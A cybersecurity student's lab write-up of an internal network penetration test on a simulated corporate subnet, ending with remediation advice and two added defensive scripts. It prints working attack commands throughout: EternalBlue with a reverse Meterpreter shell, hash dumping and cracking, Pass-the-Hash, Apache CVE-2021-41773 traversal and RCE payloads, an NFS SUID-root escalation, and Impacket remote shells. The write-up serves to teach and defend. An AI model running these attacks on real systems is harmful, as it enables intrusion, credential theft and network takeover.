N E T H R A N. W E D A G E

Cybersecurity undergraduate and web developer based in Sri Lanka, passionate about penetration testing, VAPT, and ethical hacking.


Network VAPT — Internal Lab

05 Aug 2024 — Network — CVSS 6.8 (Medium Severity)

Internal network vulnerability assessment — open ports, weak protocols, unpatched services and misconfigured firewall rules identified and documented.


This writeup documents an internal network Vulnerability Assessment and Penetration Test (VAPT) conducted against a simulated corporate lab environment. The engagement simulates a threat actor with initial internal network access — such as a compromised workstation or rogue device. Testing covers host discovery, service enumeration, exploitation of vulnerable services, credential attacks, and lateral movement across the internal network.

Engagement Info

  • Target: Internal lab network (192.168.1.0/24)
  • Type: Internal Network VAPT — Grey Box
  • Methodology: PTES (Penetration Testing Execution Standard)
  • Tools: Nmap, Metasploit, Nessus, CrackMapExec, Impacket

Step 1 — Host Discovery

Testing began with a sweep of the internal subnet to identify all live hosts before any targeted enumeration:

# ARP sweep — fast and reliable on local networks
netdiscover -r 192.168.1.0/24

# ICMP + TCP host discovery with Nmap
nmap -sn 192.168.1.0/24 -oN hosts.txt

# Identify live hosts from output
grep "report for" hosts.txt

Live hosts identified on the network:

  • 192.168.1.1 — Gateway / Router
  • 192.168.1.10 — Windows Server 2016 (DC)
  • 192.168.1.20 — Windows 10 Workstation
  • 192.168.1.30 — Linux web server (Ubuntu)
  • 192.168.1.40 — Linux file server (CentOS)

All four internal hosts (the gateway at 192.168.1.1 was left out of scope) were added to scope for detailed enumeration in the next phase.

Step 2 — Service Enumeration

A full port scan with version detection and default scripts was run against all in-scope hosts:

# Full scan against all live hosts
nmap -sV -sC -p- --min-rate 3000 \
  192.168.1.10,20,30,40 -oN services.txt

# UDP scan for key services
nmap -sU -p 53,67,69,161,500 \
  192.168.1.0/24

Key services discovered:

  • 192.168.1.10 — DNS (53), LDAP (389), SMB (445), RDP (3389), Kerberos (88)
  • 192.168.1.20 — SMB (445), RDP (3389), WinRM (5985)
  • 192.168.1.30 — HTTP (80), HTTPS (443), SSH (22), MySQL (3306)
  • 192.168.1.40 — FTP (21), SSH (22), NFS (2049), Samba (445)

Step 3 — Vulnerability Scanning

Nessus was used to perform an authenticated vulnerability scan across all hosts to identify known CVEs and misconfigurations:

# Nessus scan — key critical findings:
# 192.168.1.10 — MS17-010 EternalBlue (Critical)
# 192.168.1.20 — BlueKeep RDP CVE-2019-0708 (Critical)
# 192.168.1.30 — Apache 2.4.49 Path Traversal CVE-2021-41773
# 192.168.1.40 — Anonymous FTP enabled (Medium)
#              — NFS export with no_root_squash (High)
#              — Samba null session allowed (Medium)

Critical findings on the Windows hosts were prioritised for manual exploitation to confirm exploitability beyond automated scanner detection.

Step 4 — Exploitation (EternalBlue — DC)

The Domain Controller at 192.168.1.10 was confirmed vulnerable to MS17-010. Exploitation was performed using Metasploit:

# LHOST is the tester's machine (192.168.1.100). msfconsole's "set" takes the
# rest of the line as the value, so the comment stays outside the console.
msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set LHOST 192.168.1.100
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

The exploit returned a Meterpreter session as SYSTEM:

getuid
# Server username: NT AUTHORITY\SYSTEM

# Dump all local and domain hashes
hashdump
run post/windows/gather/smart_hashdump

NTLM hashes for all domain accounts, including the Domain Admin, were extracted from the domain controller's SAM and NTDS.dit.

Step 5 — Credential Attacks

Extracted NTLM hashes were cracked offline with Hashcat and used directly in Pass-the-Hash attacks across the network:

# Crack NTLM hashes with Hashcat
hashcat -m 1000 hashes.txt \
  /usr/share/wordlists/rockyou.txt

# Pass-the-Hash with CrackMapExec
crackmapexec smb 192.168.1.0/24 \
  -u Administrator \
  -H <NTLM_hash> \
  --shares

# Dump SAM remotely via PTH
crackmapexec smb 192.168.1.20 \
  -u Administrator \
  -H <NTLM_hash> \
  --sam

Pass-the-Hash succeeded against the workstation at 192.168.1.20 — confirming credential reuse across the domain without requiring the plaintext password.

Step 6 — Linux Host Exploitation

The Apache server at 192.168.1.30 was running version 2.4.49 — vulnerable to CVE-2021-41773 path traversal and, where mod_cgi is enabled, remote code execution:

# Path traversal — read /etc/passwd
curl "http://192.168.1.30/cgi-bin/.%2e/.%2e/etc/passwd"

# RCE via mod_cgi (if enabled)
curl -X POST \
  "http://192.168.1.30/cgi-bin/.%2e/.%2e/bin/sh" \
  --data "echo;id"
# uid=33(www-data)

The file server at 192.168.1.40 exported an NFS share with no_root_squash set. Because the server does not map a client's root to an unprivileged user, the share could be mounted as root from the testing machine and an SUID copy of bash written into it; executing that binary from an existing low-privilege shell on the file server gave root:

# Mount the NFS share
showmount -e 192.168.1.40
mount -t nfs 192.168.1.40:/data /mnt/nfs

# Write SUID shell to mounted share
cp /bin/bash /mnt/nfs/rootshell
chmod +s /mnt/nfs/rootshell

# Execute on the file server to get root
/data/rootshell -p
# whoami: root
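A defender-side check for the same misconfiguration, added here and not part of the original writeup: a small parser for /etc/exports that flags no_root_squash and wildcard exports. The sample exports file is constructed for this example; share paths and client ranges are assumptions.

```python
import re

# Constructed /etc/exports modelled on the file-server finding above; the
# share names and client ranges are assumptions, not the lab's real file.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/data      192.168.1.0/24(rw,sync,no_root_squash)
/backup    192.168.1.10(rw,sync) 192.168.1.20
/public    *(ro,all_squash)
/scratch   192.168.1.0/24(rw,no_subtree_check,root_squash)
"""

# Either "client(opt,opt,...)" or a bare client that gets exportfs defaults.
CLIENT_RE = re.compile(r'(\S+?)\(([^)]*)\)|(\S+)')

def parse_exports(text):
    """Yield (path, client, options) for every client spec in an exports file."""
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else '')
        for m in CLIENT_RE.finditer(rest):
            if m.group(1) is not None:
                yield path, m.group(1), [o for o in m.group(2).split(',') if o]
            else:
                yield path, m.group(3), []       # defaults: ro, root_squash

def audit_exports(text):
    """Return (path, client, issue) findings; root_squash is the default, so
    only an explicit no_root_squash is a finding."""
    findings = []
    for path, client, opts in parse_exports(text):
        if 'no_root_squash' in opts:
            findings.append((path, client,
                'no_root_squash: client root keeps uid 0 on the share, so an '
                'SUID binary can be planted; set root_squash'))
        if client == '*':
            findings.append((path, client,
                'exported to every host; restrict to the subnet that needs it'))
    return findings

if __name__ == '__main__':
    for path, client, issue in audit_exports(SAMPLE_EXPORTS):
        print(f'{path} {client}: {issue}')
```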

Step 7 — Lateral Movement

With domain admin credentials obtained from the DC, lateral movement was performed across the network using Impacket's suite of tools:

# Remote command execution via WMI
python3 wmiexec.py \
  domain/Administrator:password@192.168.1.20

# Remote shell via SMB
python3 psexec.py \
  domain/Administrator:password@192.168.1.20

# Dump credentials from all reachable hosts
crackmapexec smb 192.168.1.0/24 \
  -u Administrator -p password \
  --lsa

Full network compromise was achieved — all four hosts were under attacker control with SYSTEM or root level access.
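Added here as a detection-side counterpart (not part of the original writeup): the CrackMapExec sweeps in Steps 5 and 7 authenticate one account to every host in the subnet within seconds, which shows up as a burst of Event ID 4624 network (type 3) NTLM logons from a single source. The events below are constructed; host names, the time window and the threshold are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def _ev(ts, host, user, src, pkg="NTLM", logon_type=3):
    return {"ts": ts, "host": host, "user": user, "src": src,
            "type": logon_type, "pkg": pkg}

# Constructed Security 4624 events as a SIEM might forward them: the first
# four are what a single-account SMB sweep of the subnet from the tester's
# machine (192.168.1.100, as in Step 4) leaves behind; the rest are benign.
SAMPLE_EVENTS = [
    _ev("2024-08-05T10:00:01", "DC01",  "Administrator", "192.168.1.100"),
    _ev("2024-08-05T10:00:02", "WS01",  "Administrator", "192.168.1.100"),
    _ev("2024-08-05T10:00:03", "WEB01", "Administrator", "192.168.1.100"),
    _ev("2024-08-05T10:00:04", "FS01",  "Administrator", "192.168.1.100"),
    _ev("2024-08-05T10:01:00", "FS01",  "jdoe", "192.168.1.20"),
    _ev("2024-08-05T10:30:00", "DC01",  "jdoe", "192.168.1.20"),
    _ev("2024-08-05T10:05:00", "DC01",  "svc_backup", "192.168.1.50", "Kerberos"),
    _ev("2024-08-05T10:05:01", "FS01",  "svc_backup", "192.168.1.50", "Kerberos"),
]

def detect_ntlm_sweeps(events, window=timedelta(minutes=5), min_hosts=3):
    """Return {(src, user): hosts} for each source/account pair that completes
    NTLM network logons to at least `min_hosts` distinct hosts within `window`.
    One account fanning out across the subnet in seconds is the footprint of a
    Pass-the-Hash sweep; a user touching two shares half an hour apart is not."""
    recent = defaultdict(deque)          # (src, user) -> deque of (time, host)
    alerts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["type"] != 3 or ev["pkg"] != "NTLM":
            continue                     # only network logons that used NTLM
        key = (ev["src"], ev["user"])
        t = datetime.fromisoformat(ev["ts"])
        q = recent[key]
        q.append((t, ev["host"]))
        while t - q[0][0] > window:      # slide the window forward
            q.popleft()
        hosts = {h for _, h in q}
        if len(hosts) >= min_hosts:
            alerts[key] = sorted(hosts)
    return alerts

if __name__ == "__main__":
    for (src, user), hosts in detect_ntlm_sweeps(SAMPLE_EVENTS).items():
        print(f"possible PtH sweep: {user} from {src} -> {', '.join(hosts)}")
```

Tune `window` and `min_hosts` to the environment; backup and monitoring accounts that legitimately fan out should be allow-listed rather than raising the threshold for everyone.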

Step 8 — Reporting

All findings were documented in a structured network VAPT report with the following sections per vulnerability:

  • Severity — Critical / High / Medium / Low / Informational
  • CVSS v3.1 score and affected host
  • Proof of exploitation — screenshots and command output
  • Business impact — data at risk, lateral movement potential
  • Remediation — specific patch versions or configuration fixes

Priority remediation recommendations included patching MS17-010 and CVE-2021-41773 immediately, disabling NFS no_root_squash, enforcing unique local admin passwords, and enabling SMB signing across all hosts to prevent relay attacks.

Key Takeaways

  • Unpatched critical CVEs like MS17-010 give direct SYSTEM access — patch immediately
  • Password reuse across hosts enables Pass-the-Hash attacks without cracking — enforce unique passwords
  • NFS no_root_squash is a critical misconfiguration — always set root_squash
  • SMB signing disabled allows NTLM relay attacks — enforce signing across the domain
  • Domain Controllers must be hardened first — compromising the DC means full network compromise
  • Lateral movement is trivial with domain admin credentials — segment networks and limit privilege scope

Tools Used

  • Nmap — host discovery, port scanning, and service enumeration
  • Nessus — authenticated vulnerability scanning
  • Metasploit — EternalBlue exploitation and post-exploitation
  • CrackMapExec — SMB enumeration, Pass-the-Hash, and credential spraying
  • Impacket — psexec, wmiexec, secretsdump, and GetUserSPNs
  • Hashcat — offline NTLM hash cracking
  • netdiscover — ARP-based host discovery
  • curl — manual CVE-2021-41773 path traversal testing